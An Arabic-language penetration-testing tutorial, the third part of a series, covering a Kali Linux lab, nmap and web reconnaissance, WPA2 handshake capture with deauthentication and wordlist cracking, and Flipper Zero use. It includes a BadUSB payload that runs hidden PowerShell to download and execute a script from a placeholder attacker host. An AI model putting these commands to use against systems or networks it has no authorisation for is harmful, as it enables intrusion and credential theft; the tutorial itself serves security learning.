مسار الهاكر: سلسلة من 5 أجزاء
الجزء 1: مقدمة → الجزء 2: إتقان Flipper → الجزء 3: أساسيات Kali → الجزء 4: الاستغلال → الجزء 5: التدقيق الكامل
في الجزأين 1 و2، قمت بنسخ البطاقات وتحليل الترددات اللاسلكية وفهمت لماذا معظم "الأمان" مجرد مسرحية. رأيت الثغرات من الخارج. الآن تدخل إلى الداخل وتراها من منظور المهاجم.
Kali Linux هو توزيعة اختبار الاختراق المعيارية في الصناعة. يأتي محملاً مسبقاً بأكثر من 600 أداة أمنية. قد يبدو هذا مربكاً. معظم الدروس تلقيك في العمق بأوامر لا تفهمها وبدون سياق لماذا هي مهمة.
نحن نفعل هذا بشكل مختلف. بنهاية هذا المقال، سيكون لديك مختبر عامل، وستفهم استطلاع الشبكات على المستوى الأساسي، وستلتقط مصافحة WiFi الخاصة بك. كل خطوة تُبنى على السابقة.
الجزء 1: بناء مختبرك
مختبرو الاختراق المحترفون لا يشغلون Kali على جهازهم الرئيسي. يستخدمون بيئات معزولة يمكن إعادة تعيينها وأخذ لقطات لها وتدميرها دون التأثير على النظام الأساسي. ستفعل الشيء نفسه.
الخيار أ: الآلة الافتراضية (موصى بها للتعلم)
الآلة الافتراضية تمنحك أكثر بيئة تعلم أماناً. يمكنك حفظ لقطات لتقدمك وارتكاب الأخطاء والعودة فوراً.
ما ستحتاجه
- الجهاز المضيف: 16GB أو أكثر من الذاكرة، 50GB أو أكثر مساحة قرص فارغة، معالج حديث يدعم الافتراضية
- برنامج الافتراضية: VirtualBox (مجاني) أو VMware Workstation Player (مجاني للاستخدام الشخصي)
- Kali Linux: صورة VM رسمية جاهزة من kali.org
مشروع: إعداد Kali VM
الوقت: 30-45 دقيقة
الخطوات:
- حمّل صورة Kali VM لمشغل الافتراضية الخاص بك (VirtualBox أو VMware)
- استخرج الأرشيف المحمّل (يُنصح بـ 7-Zip لنظام Windows)
- استورد الآلة الافتراضية في مشغل الافتراضية
- اضبط الموارد: 4GB ذاكرة كحد أدنى (يُنصح بـ 8GB)، نواتي معالج أو أكثر
- فعّل محول الشبكة في وضع "Bridged" للوصول الكامل للشبكة
- شغّل الآلة الافتراضية وسجل الدخول ببيانات الاعتماد الافتراضية:
kali/kali - افتح الطرفية ونفّذ:
sudo apt update && sudo apt full-upgrade -y - أنشئ لقطة باسم "Fresh Install" للاسترداد السهل
التحقق من النجاح: يمكنك فتح الطرفية وتشغيل whoami ورؤية kali.
الخيار ب: أجهزة مخصصة (للتمرين الجاد)
عندما تصبح مرتاحاً مع Kali، الأجهزة المخصصة تزيل عبء الآلة الافتراضية وتتيح الوصول الكامل للعتاد، وهو أمر ضروري لاختبار الشبكات اللاسلكية.
توصيات الأجهزة
| الخيار الاقتصادي | ThinkPad X230/T430 مستعمل ($100-150)، WiFi Intel مستبدل بـ Atheros AR9285 |
|---|---|
| الخيار الحديث | Framework Laptop مع وحدة WiFi متوافقة مع Linux |
| مستشعر مخصص | Raspberry Pi 5 بسعة 4GB مع محول خارجي Alfa AWUS036ACH |
حالياً، الآلة الافتراضية مثالية. الأجهزة المخصصة تصبح مهمة عندما تحتاج وضع المراقبة لاختبار الشبكات اللاسلكية (سنتناول ذلك لاحقاً في هذا المقال).
الخيار ج: Live USB (بدون حفظ)
Live USB يشغل Kali مباشرة بدون تثبيت. كل شيء يختفي عند إيقاف التشغيل. مفيد للاختبار على أجهزة مختلفة، لكنك ستفقد عملك كل جلسة ما لم تنشئ قسماً دائماً.
1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcherأمر dd يدمر البيانات
أمر dd يكتب مباشرة على القرص بدون تأكيد. تحقق ثلاث مرات من اسم الجهاز. الكتابة على الجهاز الخاطئ ستمحو ذلك القرص بالكامل.
الجزء 2: عقلية الطرفية
قبل لمس أدوات الأمان، تحتاج أن تكون مرتاحاً في الطرفية. هذا ليس اختيارياً. واجهة المستخدم الرسومية موجودة في Kali، لكن العمل الحقيقي يحدث في سطر الأوامر.
التنقل الأساسي
1# Know where you are
2pwd # Print working directory
3
4# Move around
5cd /home/kali # Go to home directory
6cd .. # Go up one level
7cd - # Go to previous directory
8
9# See what's here
10ls # List files
11ls -la # List all files with details
12ls -lah # Human-readable sizes
13
14# Read files
15cat filename # Display entire file
16less filename # Scrollable view (q to quit)
17head -n 20 filename # First 20 lines
18tail -f filename # Follow file in real-time (logs)تصعيد الصلاحيات
العديد من أدوات الأمان تتطلب صلاحيات root. في Kali، sudo يمنحك صلاحيات root مؤقتة.
1sudo command # Run single command as root
2sudo -i # Start root shell (be careful)
3whoami # Check current user
4id # Show user and group IDsRoot بمسؤولية
التشغيل كـ root يعني عدم وجود شبكة أمان. خطأ مطبعي مثل rm -rf / سيدمر كل شيء. Kali الحديث يمنع هذا الأمر تحديداً، لكن المبدأ يبقى: افهم ما تشغله قبل أن تشغله.
إدارة العمليات
1ps aux # All running processes
2top # Real-time process viewer
3htop # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c # Stop current process
7ctrl+z # Suspend process
8bg # Resume in background
9fg # Bring to foreground
10
11# Kill processes
12kill PID # Graceful termination
13kill -9 PID # Force kill (last resort)أوامر الشبكة
1ip a # Show network interfaces
2ip route # Show routing table
3ping -c 4 8.8.8.8 # Test connectivity
4curl ifconfig.me # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.comمشروع: التعرف على الطرفية
الوقت: 15 دقيقة
المهام:
- اعثر على عنوان IP الخاص بك على الشبكة المحلية باستخدام
ip a - حدد البوابة الافتراضية باستخدام
ip route - نفّذ ping للبوابة لتأكيد الاتصال
- اعرض جميع الملفات في
/etcمرتبة حسب وقت التعديل:ls -lt /etc | head - اقرأ أول 50 سطراً من
/etc/passwd:head -n 50 /etc/passwd
الهدف: يجب أن تكون قادراً على التنقل والتحقق من حالة الشبكة وقراءة الملفات بدون تفكير.
الجزء 3: استطلاع الشبكة باستخدام Nmap
Nmap (مخطط الشبكة) هو أهم أداة ستتعلمها. يكتشف المضيفين، ويحدد الخدمات، ويكشف أنظمة التشغيل، ويرسم خريطة طوبولوجيا الشبكة. كل شيء آخر يُبنى على مخرجات nmap.
مسحك الأول
لنمسح شبكتك الخاصة. أولاً، حدد نطاق شبكتك:
1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-2551# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnetسترى مخرجات مثل:
1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)هذا المسح الأول يخبرك: "هذه الأجهزة موجودة على شبكتي." الآن لنطرح أسئلة أعمق.
اكتشاف الخدمات
بمجرد معرفة المضيفين الموجودين، تريد معرفة الخدمات التي يشغلونها.
1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)مخرجات شائعة:
1PORT STATE SERVICE VERSION
222/tcp open ssh OpenSSH 8.4p1
380/tcp open http nginx 1.18.0
4443/tcp open ssl/http nginx 1.18.0كشف نظام التشغيل
1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1فهم حالات المنافذ
يُبلغ Nmap عن المنافذ في عدة حالات:
- open - تطبيق يقبل الاتصالات بنشاط. هذا ما يبحث عنه المهاجمون.
- closed - المنفذ يمكن الوصول إليه لكن لا يوجد تطبيق يستمع. المضيف نشط لكن لا يوجد شيء هناك.
- filtered - جدار ناري أو مرشح يحجب الفحص. لا يمكن تحديد إن كان مفتوحاً أم مغلقاً.
- unfiltered - المنفذ يمكن الوصول إليه لكن nmap لا يستطيع تحديد إن كان مفتوحاً أم مغلقاً.
أنواع المسح والتخفي
1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap targetمحرك البرمجة النصية لـ Nmap (NSE)
NSE يوسع nmap بنصوص متخصصة لاكتشاف الثغرات وتعداد الخدمات والمزيد.
1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20مشروع: ارسم خريطة شبكتك
الوقت: 30 دقيقة
المتطلبات المسبقة: معرفة نطاق شبكتك من ip a
- اكتشف جميع المضيفين:
sudo nmap -sn YOUR_NETWORK/24 - اكتب قائمة بالمضيفين المكتشفين وعناوين MAC الخاصة بهم
- اختر الراوتر (عادة .1) ونفّذ:
sudo nmap -sV -sC YOUR_ROUTER - حدد جميع المنافذ المفتوحة والخدمات على الراوتر
- نفّذ
sudo nmap -A YOUR_COMPUTERلترى ما يكشفه جهازك
وثّق: أنشئ ملفاً نصياً يسرد كل جهاز وعنوان IP وMAC والخدمات. هذه خريطة شبكتك.
امسح فقط الشبكات التي تملكها
مسح الشبكات بدون تصريح غير قانوني في معظم الولايات القضائية. حتى مسح nmap بسيط قد يُعتبر وصولاً غير مصرح به. ابقَ على شبكتك وأجهزتك والشبكات التي لديك إذن كتابي صريح فيها.
الجزء 4: استطلاع الويب
مسح nmap الخاص بك على الأرجح وجد خدمات HTTP (المنافذ 80، 443، 8080). لنفهم ما يعمل هناك.
Whatweb: تعريف سريع للخدمة
# Identify web technologies
whatweb http://192.168.1.1مثال على المخرجات:
1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]Nikto: ماسح ثغرات الويب
1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentialsتعداد المجلدات: ما المخفي؟
خوادم الويب غالباً لديها مجلدات غير مرتبطة من الصفحة الرئيسية: لوحات إدارة، ملفات إعدادات، ملفات نسخ احتياطي.
# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txtاكتشافات شائعة:
1/admin (Status: 301)
2/backup (Status: 403)
3/config (Status: 200)
4/login (Status: 200)موقع قوائم الكلمات
Kali يتضمن قوائم كلمات واسعة في /usr/share/wordlists/. المجلدات الأكثر شيوعاً: dirb/، dirbuster/، rockyou.txt (كلمات مرور)، وseclists/ (مجموعة شاملة).
مشروع: تدقيق واجهة الويب للراوتر
الوقت: 20 دقيقة
- نفّذ
whatweb http://YOUR_ROUTER_IPلتحديد الخادم - نفّذ
nikto -h http://YOUR_ROUTER_IPللتحقق من الثغرات - نفّذ
gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt - زر المجلدات المكتشفة في المتصفح
- سجّل أي لوحات إدارة أو أرقام إصدارات أو اكتشافات مثيرة للاهتمام
اكتشاف شائع: صفحات إدارة الراوتر مكشوفة ببيانات اعتماد افتراضية.
الجزء 5: الاستطلاع اللاسلكي
هنا تصبح الأمور مثيرة. شبكات WiFi تبث باستمرار، وبالأدوات الصحيحة، يمكنك التقاط مصافحات المصادقة: التبادل المشفر الذي يحدث عند اتصال جهاز.
متطلبات العتاد
WiFi المدمج لديك على الأرجح لن يعمل لهذا. تحتاج محولاً يدعم وضع المراقبة وحقن الحزم. يُنصح بـ: Alfa AWUS036ACH (حوالي $50) أو Alfa AWUS036ACM (حوالي $45). تعمل مباشرة مع Kali.
فهم وضع المراقبة
وضع WiFi العادي ("managed mode") يستقبل فقط الحزم الموجهة لجهازك. وضع المراقبة يلتقط جميع الحزم في النطاق، حركة مرور كل جهاز على القناة.
1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0monمسح الشبكات
1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID = Router MAC address
6# PWR = Signal strength (higher = closer)
7# CH = Channel
8# ENC = Encryption (WPA2, WPA3, OPN)
9# ESSID = Network name
10
11# Press Ctrl+C to stopما تراه هو كل شبكة WiFi في النطاق، إعدادات أمانها، وغالباً الأجهزة المتصلة بها. هذا ما يراه war driver عند مسح الأحياء.
التقاط المصافحة
عندما يتصل جهاز بشبكة WPA2، تحدث مصافحة رباعية. إذا التقطت هذه المصافحة، يمكنك محاولة كسر كلمة المرور دون اتصال.
1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshakeعند التقاط المصافحة، يعرض airodump-ng [ WPA handshake: XX:XX:XX:XX:XX:XX ] في الزاوية العلوية اليمنى.
هجمات Deauth غير قانونية
إرسال حزم إلغاء المصادقة لشبكات لا تملكها جريمة فيدرالية بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (في الولايات المتحدة) وقوانين مماثلة في أماكن أخرى. اختبر فقط على شبكتك. الهدف هو فهم الثغرة، وليس مهاجمة الآخرين.
كسر المصافحة
بمصافحة ملتقطة، يمكنك محاولة كسر كلمة المرور دون اتصال باستخدام قائمة كلمات:
1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txtفحص واقعية قوة كلمات المرور
rockyou.txt يحتوي على أكثر من 14 مليون كلمة مرور من اختراقات بيانات حقيقية. إذا كانت كلمة مرور WiFi الخاصة بك "password123" أو "summer2024" أو اسم كلبك، يمكن كسرها في ثوانٍ. كلمة مرور عشوائية من 12 حرفاً أو أكثر ستحتاج ملايين السنين لكسرها بالقوة الغاشمة.
مشروع: اختبر أمان WiFi الخاص بك
الوقت: 45 دقيقة
المتطلبات المسبقة: محول WiFi خارجي يدعم وضع المراقبة
- فعّل وضع المراقبة:
sudo airmon-ng start wlan0 - امسح الشبكات:
sudo airodump-ng wlan0mon - سجّل القناة وBSSID لشبكتك
- التقط على قناتك:
sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon - أعد توصيل جهاز بشبكة WiFi (أو استخدم deauth على شبكتك فقط)
- أكّد التقاط المصافحة
- اختبر ضد rockyou.txt:
aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap
النتيجة: إذا وُجدت كلمة مرورك، غيّرها فوراً إلى شيء عشوائي وطويل (20 حرفاً أو أكثر).
الجزء 6: توصيل Flipper Zero الخاص بك
تتذكر كل تلك الالتقاطات من الجزء 2؟ لندمجها في سير عملك مع Kali.
نقل الملفات
1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/ # Sub-GHz captures
9/mnt/flipper/nfc/ # NFC dumps
10/mnt/flipper/infrared/ # IR captures
11/mnt/flipper/lfrfid/ # 125kHz RFID
12/mnt/flipper/badusb/ # BadUSB scriptsتحليل تفريغات NFC
1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | lessتحليل Sub-GHz
1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)تطوير BadUSB
أنشئ حمولات BadUSB في Kali، اختبرها على Flipper:
1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/حمولات BadUSB قوية
هذه النصوص البرمجية تُنفذ تلقائياً عند التوصيل. حمولة خبيثة يمكنها تثبيت أبواب خلفية أو سرقة بيانات الاعتماد أو تدمير البيانات في ثوانٍ. استخدم فقط على أجهزتك للاختبار. لا تترك Flipper أبداً في مكان قد يوصله شخص آخر.
الجزء 7: التوثيق وسير العمل
مختبرو الاختراق المحترفون لا يشغلون الأدوات فحسب. يوثقون كل شيء. التوثيق الجيد يفصل الهواة عن المحترفين.
تدوين الملاحظات بـ CherryTree
1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitationحفظ مخرجات Nmap
1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml (parseable)
7# scan_results.gnmap (greppable)تسجيل الجلسة
1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop loggingمسار الهاكر
سلسلة من 5 أجزاء تنقلك من الفضول إلى الكفاءة.
الجزء 1: مقدمة الجزء 2: إتقان Flipper الجزء 3: أساسيات Kali ✓ الجزء 4: الاستغلال الجزء 5: التدقيق الكامل
قائمة تحقق الجزء 3
☐ إعداد المختبر: Kali VM يعمل، محدّث، لقطة محفوظة
☐ الطرفية: مرتاح مع التنقل والصلاحيات والتحكم بالعمليات
☐ Nmap: الشبكة مُرسّمة، الخدمات محددة، الراوتر ممسوح
☐ استطلاع الويب: واجهة ويب الراوتر تم تحليلها بـ whatweb/nikto
☐ اللاسلكي: وضع المراقبة مُفعّل، الشبكات ممسوحة
☐ المصافحة: مصافحة WiFi الخاصة ملتقطة ومختبرة
☐ Flipper: الملفات منقولة، سير العمل مفهوم
☐ التوثيق: الملاحظات منظمة، عمليات المسح محفوظة
ما التالي
لقد بنيت مختبرك وتعلمت مرحلة الاستطلاع. يمكنك اكتشاف المضيفين وتحديد الخدمات والتقاط المصافحات اللاسلكية. تفهم ما يراه المهاجمون عند النظر إلى شبكة.
في الجزء 4، ننتقل من الاستطلاع إلى الاستغلال. ستتعلم:
- Metasploit Framework، السكين السويسري للاستغلال
- سير عمل استغلال الثغرات الشائعة
- تقنيات ما بعد الاستغلال: ما يحدث بعد الوصول الأولي
- تصعيد الصلاحيات: من مستخدم عادي إلى مسؤول
- التمحور: استخدام نظام مخترق لمهاجمة آخرين
الاستطلاع يخبرك أين الأبواب. الاستغلال يعلمك كيف تمر من خلالها.
لقد رسمت خريطة المنطقة. الآن تتعلم التنقل فيها. الجزء 4 ينقلك من مراقب إلى مُشغّل.
نراكم في الجزء 4.